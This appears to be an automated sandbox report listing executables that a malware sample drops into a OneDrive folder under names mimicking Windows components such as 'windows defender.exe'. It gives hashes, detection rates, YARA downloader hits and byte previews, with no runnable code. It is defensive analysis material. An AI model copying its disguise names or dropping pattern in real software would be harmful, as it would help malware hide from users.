                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\reference assemblies.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\reference assemblies.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows defender.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows defender.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows defender.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows mail.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows mail.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows mail.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows media player.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows media player.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows media player.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows multimedia platform.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows multimedia platform.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows multimedia platform.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows nt.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows nt.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows nt.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows photo viewer.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows photo viewer.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows photo viewer.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows portable devices.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows portable devices.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows portable devices.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windows sidebar.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows sidebar.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windows sidebar.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\windowspowershell.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windowspowershell.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
